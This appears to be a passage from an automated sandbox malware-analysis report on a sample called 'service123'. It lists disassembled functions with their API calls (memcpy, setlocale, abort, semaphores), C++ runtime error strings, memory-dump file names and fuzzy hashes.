Instruction Fuzzy Hash: C2716FB69097518FC300EF2CD58064AFBE4BF89218F558A9EE5C89B315E331D845CF92

Function 6C2FEB70 Relevance: 9.2, APIs: 6, Instructions: 203COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2931548050.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000005.00000002.2931529797.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931660942.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931678084.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931713504.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931730780.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931747859.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c2f0000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9ff8390f7064b2eec1ab42af84fa55342ea2eed4810115e48aac89551600db43
Instruction ID: a3a6ff52e840b4c32f8170dbd9de57f6c8f08a7c9a4eb385cc61c5033c4fdf3e
Opcode Fuzzy Hash: 9ff8390f7064b2eec1ab42af84fa55342ea2eed4810115e48aac89551600db43
Instruction Fuzzy Hash: 83619D7568930D8FD311CF19C49065AF7E6AF88318F448A2EFCA89BB44D730D9478B96

Function 6C30B060 Relevance: 9.1, APIs: 6, Instructions: 145COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,?,?,6C30AF3F), ref: 6C3C5FF0
abort.MSVCRT(?,?,?,?,?,?,6C30AE9C,?,?,?,?,?,?,6C3C6040), ref: 6C3C5FF8
abort.MSVCRT(?,?,?,?,?,?,6C30AE9C,?,?,?,?,?,?,6C3C6040), ref: 6C3C6000
abort.MSVCRT(?,?,?,?,?,?,6C30AE9C,?,?,?,?,?,?,6C3C6040), ref: 6C3C6008

Memory Dump Source

Source File: 00000005.00000002.2931548050.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000005.00000002.2931529797.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931660942.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931678084.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931713504.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931730780.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931747859.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c2f0000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: f4cb0ac775d485b3fc76993c5629aaefb3ccd5bb92ad02dc4fce326cb3604300
Instruction ID: eca975fe45d13b45135f46667b5b0e591851366678aa32f9284c18a09465038e
Opcode Fuzzy Hash: f4cb0ac775d485b3fc76993c5629aaefb3ccd5bb92ad02dc4fce326cb3604300
Instruction Fuzzy Hash: B541B0727093148BCB04AF78C4816EEB7A1EF8221CF14886DD4C48BB15D736984ACF93

Function 6C2F1020 Relevance: 9.1, APIs: 6, Instructions: 100sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(?,?,?,6C2F1281,?,?,?,?,?,?,6C2F13AE), ref: 6C2F1057
_amsg_exit.MSVCRT ref: 6C2F1086

Memory Dump Source

Source File: 00000005.00000002.2931548050.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000005.00000002.2931529797.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931660942.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931678084.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931713504.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931730780.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931747859.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c2f0000_service123.jbxd

Similarity

API ID: Sleep_amsg_exit
String ID:
API String ID: 1015461914-0
Opcode ID: 2cb8b33c496b4bf920b51eed204640eb480df6a36abc5d10fc09351b3973cc70
Instruction ID: a48ea27c56f298bbcba92a6ae5dae85cb010a685790f3896a9cf938c667b3c43
Opcode Fuzzy Hash: 2cb8b33c496b4bf920b51eed204640eb480df6a36abc5d10fc09351b3973cc70
Instruction Fuzzy Hash: BC3171B178C3498FDB00EF19C582B66BAF0EB42398F91451DE8A48BF40DA31C485CB92

Function 6C311F00 Relevance: 9.0, APIs: 6, Instructions: 50stringCOMMON

Download Yara Rule

APIs

setlocale.MSVCRT ref: 6C311F18
strlen.MSVCRT ref: 6C311F22
memcpy.MSVCRT ref: 6C311F3F
setlocale.MSVCRT ref: 6C311F52
wcsftime.MSVCRT ref: 6C311F76
setlocale.MSVCRT ref: 6C311F88

Memory Dump Source

Source File: 00000005.00000002.2931548050.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000005.00000002.2931529797.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931660942.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931678084.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931713504.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931730780.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931747859.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c2f0000_service123.jbxd

Similarity

API ID: setlocale$memcpystrlenwcsftime
String ID:
API String ID: 3412479102-0
Opcode ID: 424b18269c9568b601aa084ce7b792cc48ee0dbfdd54ac89f4617c58107e666f
Instruction ID: dd820b391a2c98607f9f1faba55aa9b5925f54dd5e811ec21571e52cd23885a7
Opcode Fuzzy Hash: 424b18269c9568b601aa084ce7b792cc48ee0dbfdd54ac89f4617c58107e666f
Instruction Fuzzy Hash: C6119EB1A09310AFC340AF69C58569EBBE4BF88754F41882EE4C98B710E779D844CF93

Function 6C311C50 Relevance: 9.0, APIs: 6, Instructions: 49stringCOMMON

Download Yara Rule

APIs

setlocale.MSVCRT ref: 6C311C68
strlen.MSVCRT ref: 6C311C72
memcpy.MSVCRT ref: 6C311C8F
setlocale.MSVCRT ref: 6C311CA2
strftime.MSVCRT ref: 6C311CC6
setlocale.MSVCRT ref: 6C311CD8

Memory Dump Source

Source File: 00000005.00000002.2931548050.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000005.00000002.2931529797.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931660942.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931678084.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931713504.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931730780.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931747859.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c2f0000_service123.jbxd

Similarity

API ID: setlocale$memcpystrftimestrlen
String ID:
API String ID: 1843691881-0
Opcode ID: 6c6be702ecd5bb5de11d644345ab9c433beb98d3ffe32bd8be6ea1cefaf23c18
Instruction ID: 14628cc8fd0bc2f6ca53e376fc3c1eaf4e7e5506df25bd55c441b5b092357ffe
Opcode Fuzzy Hash: 6c6be702ecd5bb5de11d644345ab9c433beb98d3ffe32bd8be6ea1cefaf23c18
Instruction Fuzzy Hash: 021192B5609310AFC340AF69C48579EBBE4BF84654F458C2DE8C987711E779D8448F93

Function 6C2FED31 Relevance: 9.0, APIs: 6, Instructions: 19COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D65
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D6A
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D6F
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C30038F), ref: 6C3C6D74
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C30038F), ref: 6C3C6D79
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C30038F), ref: 6C3C6D7E

Memory Dump Source

Source File: 00000005.00000002.2931548050.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000005.00000002.2931529797.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931660942.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931678084.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931713504.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931730780.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931747859.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c2f0000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 43ff2732fdef0f94484c1c8e9571a78a07aad364bf0272b15e68b5917b8ab3da
Instruction ID: 5ea248cf3b37e04ac2d9ec2e16310a58dd1c7e69529847f1b9b85891eefce67f
Opcode Fuzzy Hash: 43ff2732fdef0f94484c1c8e9571a78a07aad364bf0272b15e68b5917b8ab3da
Instruction Fuzzy Hash: 60B09232AD826D85C42069AC00253AAE21D9702348F40080A99B663C088652A4874A57

Function 6C30E0D0 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 130windowCOMMON

Download Yara Rule

APIs

FormatMessageA.KERNEL32 ref: 6C30E117
LocalFree.KERNEL32 ref: 6C30E14B

Strings

Unknown error code, xrefs: 6C30E18C
basic_string: construction from null is not valid, xrefs: 6C30E1A7

Memory Dump Source

Source File: 00000005.00000002.2931548050.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000005.00000002.2931529797.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931660942.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931678084.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931713504.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931730780.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931747859.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c2f0000_service123.jbxd

Similarity

API ID: FormatFreeLocalMessage
String ID: Unknown error code$basic_string: construction from null is not valid
API String ID: 1427518018-3299438129
Opcode ID: 108ff36c435f77cde42e1fc7ac7b7f7952987ce1369196d4ccb8293e9d01fdc6
Instruction ID: 1ade15472dc6dce0e63845ab01ebf99c9a56ca96cfe800c63c724d2811eda05f
Opcode Fuzzy Hash: 108ff36c435f77cde42e1fc7ac7b7f7952987ce1369196d4ccb8293e9d01fdc6
Instruction Fuzzy Hash: 8E415AB6A047049BCB00AF69C4856AEFBF4EF89714F41882CE5D49BB10D77198898FD3

Function 00C12F89 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMON

Download Yara Rule

APIs

fputc.MSVCRT ref: 00C12E97
fputc.MSVCRT ref: 00C12F07
memset.MSVCRT ref: 00C12FC2

Strings

o, xrefs: 00C12FCA
0, xrefs: 00C12FB7

Memory Dump Source

Source File: 00000005.00000002.2931183608.0000000000C11000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000005.00000002.2931163525.0000000000C10000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2931201942.0000000000C1A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2931219875.0000000000C1E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2931236780.0000000000C21000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_c10000_service123.jbxd

Similarity

API ID: fputc$memset
String ID: 0$o
API String ID: 2944404495-4157579757
Opcode ID: 448672419a6aefb592f870ea4cfb86913ff9ea238fa630640188f8821d0f5d8b
Instruction ID: 92ef1ca12c523dacad5217572e1f4c8f64a8b015664a72acc229c92708182356
Opcode Fuzzy Hash: 448672419a6aefb592f870ea4cfb86913ff9ea238fa630640188f8821d0f5d8b
Instruction Fuzzy Hash: 59317A79A04309CFCB10CF68C0847EABBF1BF5A311F148529D999AB341D738E995EB90

Function 6C303659 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMON

Download Yara Rule

APIs

fputc.MSVCRT ref: 6C303567
fputc.MSVCRT ref: 6C3035D7
memset.MSVCRT ref: 6C303692

Strings

o, xrefs: 6C30369A
0, xrefs: 6C303687

Memory Dump Source

Source File: 00000005.00000002.2931548050.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000005.00000002.2931529797.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931660942.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931678084.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931713504.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931730780.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931747859.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c2f0000_service123.jbxd

Similarity

API ID: fputc$memset
String ID: 0$o
API String ID: 2944404495-4157579757
Opcode ID: 4e5d1ba6c8a4e8df9e646095398d9879c6dbcde4af08328c22bcc6dcc1e4ca11
Instruction ID: 5224eee9a5d75226ec0bfff4f3ed499df9122ca52c3afa853115b338c275eeeb
Opcode Fuzzy Hash: 4e5d1ba6c8a4e8df9e646095398d9879c6dbcde4af08328c22bcc6dcc1e4ca11
Instruction Fuzzy Hash: 6A315972A093058BCB40CF69C080BAAB7F5BF49318F158669D995ABB51E339E804CF50

Function 6C2F9490 Relevance: 7.9, APIs: 4, Strings: 1, Instructions: 375stringCOMMON

Download Yara Rule

APIs

strncmp.MSVCRT ref: 6C2F94C2
strlen.MSVCRT ref: 6C2F9616

Strings

_GLOBAL_, xrefs: 6C2F94B7

Memory Dump Source

Source File: 00000005.00000002.2931548050.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000005.00000002.2931529797.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931660942.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931678084.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931713504.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931730780.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931747859.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c2f0000_service123.jbxd

Similarity

API ID: strlenstrncmp
String ID: _GLOBAL_
API String ID: 1310274236-770460502
Opcode ID: 3a50b6347ae4830498885e7f05993cb41b99398b3e5207a7065f289daea30cb9
Instruction ID: 4da606ea1b397b15f0856919f4a1365a62f23519826ecb86ad0d7daf114c9a6f
Opcode Fuzzy Hash: 3a50b6347ae4830498885e7f05993cb41b99398b3e5207a7065f289daea30cb9
Instruction Fuzzy Hash: E3F18EB0D4421D8FEB10DF29C8903DDFBF1AF46308F0441AAD869AB645D7759A9ACF81

Function 6C36DAB0 Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 229COMMON

Download Yara Rule

APIs

Part of subcall function 6C38F8C0: memmove.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000,?,?,6C36DA2E), ref: 6C38F95D
Part of subcall function 6C38F8C0: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000,?,?,6C36DA2E), ref: 6C38F988

memcpy.MSVCRT ref: 6C36DCB5

Part of subcall function 6C392530: memcpy.MSVCRT(?,-00000001,?,6C31749E,?,?,?,?,?,?,?,?,?,?,?,6C318E25), ref: 6C39256C

Strings

basic_string::append, xrefs: 6C36DDB2, 6C36DDBE
iostream error, xrefs: 6C36DD08
Unknown error, xrefs: 6C36DB08

Memory Dump Source

Source File: 00000005.00000002.2931548050.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000005.00000002.2931529797.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931660942.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931678084.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931713504.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931730780.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931747859.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c2f0000_service123.jbxd

Similarity

API ID: memcpy$memmove
String ID: Unknown error$basic_string::append$iostream error
API String ID: 1283327689-1474074352
Opcode ID: c9c46ed3982849ae7b48651ab47b87c1523ae0029d30d8548e42012566c34a68
Instruction ID: ee4abcb11a70626f467bedd19ee6eb4f8303782014c7abbf0b9f3b98674ac746
Opcode Fuzzy Hash: c9c46ed3982849ae7b48651ab47b87c1523ae0029d30d8548e42012566c34a68
Instruction Fuzzy Hash: 3DA105B5D04318CBCB10EFA9C48069DBBF5BF49314F21892ED494ABB54E771A845CF92

Function 6C35BF60 Relevance: 7.7, APIs: 3, Strings: 2, Instructions: 216COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 6C35C03F
memcpy.MSVCRT ref: 6C35C099
memcpy.MSVCRT ref: 6C35C127

Part of subcall function 6C35C500: memcpy.MSVCRT ref: 6C35C58C

Strings

%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 6C35C1B3
basic_string::replace, xrefs: 6C35C194, 6C35C1A7

Memory Dump Source

Source File: 00000005.00000002.2931548050.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000005.00000002.2931529797.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931660942.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931678084.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931713504.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931730780.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931747859.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c2f0000_service123.jbxd

Similarity

API ID: memcpy
String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::replace
API String ID: 3510742995-3564965661
Opcode ID: 60122dd82be08f21f2603e65087caabc38d20dd2afb3727e836eb729a6823bff
Instruction ID: 8758b2f6576879fe1eaf922e9583c5edea58f7faebdc7d918a8062440a589cd9
Opcode Fuzzy Hash: 60122dd82be08f21f2603e65087caabc38d20dd2afb3727e836eb729a6823bff
Instruction Fuzzy Hash: F3815771A052159FCB00EF28D88099EBBF1FF88718F51892DE89897710E731E964CF92

Function 6C365000 Relevance: 7.7, APIs: 3, Strings: 2, Instructions: 205COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 6C3650D0
memcpy.MSVCRT ref: 6C365124
memcpy.MSVCRT ref: 6C3651B8

Part of subcall function 6C365590: memcpy.MSVCRT ref: 6C365620

Strings

%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 6C365248
basic_string::replace, xrefs: 6C365229, 6C36523C

Memory Dump Source

Source File: 00000005.00000002.2931548050.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000005.00000002.2931529797.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931660942.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931678084.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931713504.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931730780.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931747859.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c2f0000_service123.jbxd

Similarity

API ID: memcpy
String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::replace
API String ID: 3510742995-3564965661
Opcode ID: 6445647ff4e06afa7b862d69d1deb9d3a0a80f82af57311e8e8001cece40b054
Instruction ID: bac9871d0664d0ce66b7d89af2fe81a757e5678171fcbbcbf9601f7f427f0499
Opcode Fuzzy Hash: 6445647ff4e06afa7b862d69d1deb9d3a0a80f82af57311e8e8001cece40b054
Instruction Fuzzy Hash: 70813675A092059FCB00DF6EC88059EFBF5AF88354F108A2EE899D7B15D331D9448F92

Function 6C36D810 Relevance: 7.7, APIs: 3, Strings: 2, Instructions: 153stringCOMMON

Download Yara Rule

APIs

Part of subcall function 6C38F8C0: memmove.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000,?,?,6C36DA2E), ref: 6C38F95D
Part of subcall function 6C38F8C0: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000,?,?,6C36DA2E), ref: 6C38F988

strlen.MSVCRT ref: 6C36D8E5
memcpy.MSVCRT ref: 6C36D9BE

Strings

iostream error, xrefs: 6C36DA12
Unknown error, xrefs: 6C36D85E

Memory Dump Source

Source File: 00000005.00000002.2931548050.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000005.00000002.2931529797.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931660942.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931678084.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931713504.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931730780.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931747859.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c2f0000_service123.jbxd

Similarity

API ID: memcpy$memmovestrlen
String ID: Unknown error$iostream error
API String ID: 1234831610-3609051425
Opcode ID: 0165614f5d9b54df6be1c9fd20df6b85a6cdcb0dea66f7fe7a69cd5768843205
Instruction ID: af05e8a8418246225724d6bbc0dc02eb0565159a6f35dbe038d16bf23c2d6beb
Opcode Fuzzy Hash: 0165614f5d9b54df6be1c9fd20df6b85a6cdcb0dea66f7fe7a69cd5768843205
Instruction Fuzzy Hash: 5761E5B0904308CFDB04DFA9C48469EBBF1BF88314F24892ED4999B755E7749848CF92

Function 6C2FF840 Relevance: 7.6, APIs: 5, Instructions: 87COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 6C2FF85F
ReleaseSemaphore.KERNEL32 ref: 6C2FF8E3

Memory Dump Source

Source File: 00000005.00000002.2931548050.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000005.00000002.2931529797.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931660942.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931678084.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931713504.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931730780.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931747859.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c2f0000_service123.jbxd

Similarity

API ID: ReleaseSemaphoremalloc
String ID:
API String ID: 755742884-0
Opcode ID: c0086c0008e5ff5ccc2dcbacf9d4de7f085185868df4f59bb58e7721831c33d4
Instruction ID: 3354a554e6fea395ebdf1298df47e02952e05d969f4515107c7f15ad8390661d
Opcode Fuzzy Hash: c0086c0008e5ff5ccc2dcbacf9d4de7f085185868df4f59bb58e7721831c33d4
Instruction Fuzzy Hash: C8316D706493098FDB00EF29C54975BBBF4BB46319F05865CE8A847B80D335E646CB92

Function 6C2FFCE0 Relevance: 7.6, APIs: 5, Instructions: 78synchronizationCOMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 6C2FFCEC
ReleaseSemaphore.KERNEL32 ref: 6C2FFD7C
CreateSemaphoreW.KERNEL32 ref: 6C2FFDC7
WaitForSingleObject.KERNEL32 ref: 6C2FFE10

Memory Dump Source

Source File: 00000005.00000002.2931548050.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000005.00000002.2931529797.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931660942.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931678084.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931713504.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931730780.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931747859.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c2f0000_service123.jbxd

Similarity

API ID: Semaphore$CreateObjectReleaseSingleWaitmalloc
String ID:
API String ID: 2768075653-0
Opcode ID: a7bd63777cd46b3ffc61caa84bebda68dbfec96a008d83ffe0a82beb58ef5936
Instruction ID: 8d9580e23bb0ac9ec806b08915f6d35b9219f7a5c26d70ee1e4acc1f792cef5e
Opcode Fuzzy Hash: a7bd63777cd46b3ffc61caa84bebda68dbfec96a008d83ffe0a82beb58ef5936
Instruction Fuzzy Hash: 76312D746493098FDB00EF2DC54975BBBF4BB06319F11865CE8A887680D335E546CFA2

Function 6C3B8520 Relevance: 7.6, APIs: 5, Instructions: 64stringCOMMON

Download Yara Rule

APIs

setlocale.MSVCRT ref: 6C3B8535
strlen.MSVCRT ref: 6C3B8583
memcpy.MSVCRT ref: 6C3B85A0
setlocale.MSVCRT ref: 6C3B85B4
setlocale.MSVCRT ref: 6C3B85EA

Memory Dump Source

Source File: 00000005.00000002.2931548050.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000005.00000002.2931529797.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931660942.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931678084.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931713504.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931730780.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931747859.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c2f0000_service123.jbxd

Similarity

API ID: setlocale$memcpystrlen
String ID:
API String ID: 4096897932-0
